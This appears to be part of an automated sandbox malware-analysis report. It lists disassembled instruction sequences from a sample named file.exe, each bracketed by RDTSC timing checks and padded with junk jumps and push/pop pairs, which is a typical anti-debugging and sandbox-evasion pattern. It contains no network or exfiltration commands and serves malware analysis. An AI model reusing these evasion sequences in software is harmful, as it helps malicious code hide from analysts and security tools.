          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1031F second address: 4D1037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B4535CE2h 0x00000009 or cx, 3DE8h 0x0000000e jmp 00007F37B4535CDBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F37B4535CE8h 0x0000001a sub si, D048h 0x0000001f jmp 00007F37B4535CDBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e mov di, 3724h 0x00000032 popad 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1037E second address: 4D10383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10383 second address: 4D103DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 9645h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push esi 0x00000011 call 00007F37B4535CE9h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F37B4535CDCh 0x0000001f mov eax, dword ptr [75444538h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F37B4535CE7h 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D103DB second address: 4D1042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F37B453709Eh 0x00000011 xor eax, ebp 0x00000013 jmp 00007F37B45370A1h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F37B453709Dh 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1042C second address: 4D1047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F37B4535CE3h 0x0000000c and ch, 0000001Eh 0x0000000f jmp 00007F37B4535CE9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F37B4535CE3h 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1047E second address: 4D10482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10482 second address: 4D10488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10488 second address: 4D1048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1048E second address: 4D104A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop esi 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104A0 second address: 4D104C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B453709Dh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104C3 second address: 4D104D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104D3 second address: 4D104D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104D7 second address: 4D1050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f mov cl, dh 0x00000011 mov bx, si 0x00000014 popad 0x00000015 mov dword ptr [ebp-18h], esp 0x00000018 jmp 00007F37B4535CE0h 0x0000001d mov eax, dword ptr fs:[00000018h] 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1050B second address: 4D1055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, AB75h 0x00000009 popad 0x0000000a mov ecx, dword ptr [eax+00000FDCh] 0x00000010 jmp 00007F37B45370A0h 0x00000015 test ecx, ecx 0x00000017 jmp 00007F37B45370A0h 0x0000001c jns 00007F37B45370DEh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F37B45370A7h 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1055C second address: 4D10562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10562 second address: 4D10566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10566 second address: 4D1056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0002D second address: 4D00033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00033 second address: 4D000B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e movsx ebx, ax 0x00000011 pop ecx 0x00000012 mov edi, 3B6559E8h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F37B4535CDDh 0x00000020 call 00007F37B4535CE0h 0x00000025 pop esi 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007F37B4535CE0h 0x0000002d sub esi, 259EF778h 0x00000033 jmp 00007F37B4535CDBh 0x00000038 popfd 0x00000039 popad 0x0000003a sub esp, 2Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F37B4535CE0h 0x00000046 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000B0 second address: 4D000BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000BF second address: 4D000FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F37B4535CDEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CDEh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000FC second address: 4D00102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00102 second address: 4D00154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F37B4535CDFh 0x00000010 sbb ecx, 55C28F5Eh 0x00000016 jmp 00007F37B4535CE9h 0x0000001b popfd 0x0000001c mov ecx, 7B959C27h 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007F37B4535CDAh 0x00000028 push eax 0x00000029 pushad 0x0000002a mov bh, 55h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00154 second address: 4D0016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F37B45370A1h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0016E second address: 4D00174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00174 second address: 4D00178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0022A second address: 4D00230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00230 second address: 4D00281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F37B453729Ah 0x00000011 pushad 0x00000012 call 00007F37B453709Ch 0x00000017 mov ch, C0h 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F37B453709Ch 0x00000020 adc si, EB28h 0x00000025 jmp 00007F37B453709Bh 0x0000002a popfd 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00281 second address: 4D00285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00285 second address: 4D0028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D002CA second address: 4D0031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B4535CDFh 0x00000009 and ecx, 16609F2Eh 0x0000000f jmp 00007F37B4535CE9h 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F37B4535CE2h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00367 second address: 4D003DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F37B453709Ch 0x00000012 adc ah, 00000028h 0x00000015 jmp 00007F37B453709Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F37B45370A8h 0x00000021 sub al, FFFFFF88h 0x00000024 jmp 00007F37B453709Bh 0x00000029 popfd 0x0000002a popad 0x0000002b jg 00007F3824C25156h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dx, 94F6h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D003DC second address: 4D0041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F37B4535D33h 0x0000000f jmp 00007F37B4535CE0h 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007F37B4535CE0h 0x0000001c jne 00007F3824C23D5Eh 0x00000022 pushad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0041D second address: 4D00457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A8h 0x0000000b and ax, A7A8h 0x00000010 jmp 00007F37B453709Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00457 second address: 4D0045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0045B second address: 4D004DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F37B453709Ch 0x00000008 sbb ecx, 1FA01A08h 0x0000000e jmp 00007F37B453709Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-2Ch] 0x0000001a jmp 00007F37B45370A6h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov al, 3Bh 0x00000023 pushfd 0x00000024 jmp 00007F37B45370A3h 0x00000029 sbb ax, 1FAEh 0x0000002e jmp 00007F37B45370A9h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F37B453709Ch 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D004DF second address: 4D00546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 398930C3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F37B4535CE6h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 mov eax, edx 0x00000016 pop ebx 0x00000017 mov al, 0Ch 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F37B4535CE0h 0x00000020 nop 0x00000021 jmp 00007F37B4535CE0h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F37B4535CE7h 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00546 second address: 4D0054C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0054C second address: 4D00550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00550 second address: 4D00554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00554 second address: 4D00563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00563 second address: 4D00567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00567 second address: 4D0056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0056D second address: 4D00573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00573 second address: 4D0058D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B4535CDFh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0058D second address: 4D00593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D005ED second address: 4CF0E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3824C23D21h 0x0000000f xor eax, eax 0x00000011 jmp 00007F37B450F40Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 cmp esi, 00000000h 0x00000026 setne al 0x00000029 xor ebx, ebx 0x0000002b test al, 01h 0x0000002d jne 00007F37B4535CD7h 0x0000002f jmp 00007F37B4535DDFh 0x00000034 call 00007F37B8E524E0h 0x00000039 mov edi, edi 0x0000003b jmp 00007F37B4535CE3h 0x00000040 xchg eax, ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F37B4535CE0h 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E15 second address: 4CF0E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E19 second address: 4CF0E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E1F second address: 4CF0E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 75B3h 0x00000007 mov ah, BAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F37B45370A7h 0x00000015 mov cx, 6BEFh 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E4B second address: 4CF0E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, FBh 0x00000005 movzx ecx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E5D second address: 4CF0E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E61 second address: 4CF0E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E67 second address: 4CF0E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 7DF14960h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E7B second address: 4CF0E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0E7F second address: 4CF0EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c mov al, A5h 0x0000000e mov bh, CFh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, 6A8C3084h 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0F07 second address: 4CF0F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0F0B second address: 4CF0F0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0F0F second address: 4CF0F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0F15 second address: 4CF0F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF0F1B second address: 4CF0F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00910 second address: 4D00946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A4h 0x0000000b adc ecx, 00196608h 0x00000011 jmp 00007F37B453709Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00946 second address: 4D0094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0094A second address: 4D0094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0094E second address: 4D00954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00954 second address: 4D00987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F37B45370A0h 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 pushad 0x00000018 mov eax, 30CBAA2Dh 0x0000001d pushad 0x0000001e mov bx, ax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00987 second address: 4D009BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 je 00007F3824C13D48h 0x0000000c jmp 00007F37B4535CE0h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F37B4535CE7h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00A39 second address: 4D00A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F37B453709Bh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F37B45370A5h 0x0000001b mov edx, esi 0x0000001d popad 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 pushad 0x00000027 mov edi, esi 0x00000029 popad 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov al, F4h 0x00000030 jmp 00007F37B453709Bh 0x00000035 popad 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A03 second address: 4D10A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A07 second address: 4D10A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A0B second address: 4D10A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A11 second address: 4D10A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B45370A0h 0x00000009 sbb esi, 1CA51B28h 0x0000000f jmp 00007F37B453709Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F37B45370A1h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A4F second address: 4D10A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4AE8BDD2h 0x00000008 mov ah, bl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 call 00007F37B4535CDCh 0x00000017 movzx ecx, bx 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ax, dx 0x00000021 mov cx, bx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push esi 0x0000002a pop edx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10A84 second address: 4D10A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov dx, 8C92h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cx, BC51h 0x00000016 mov si, CC8Dh 0x0000001a popad 0x0000001b rdtsc
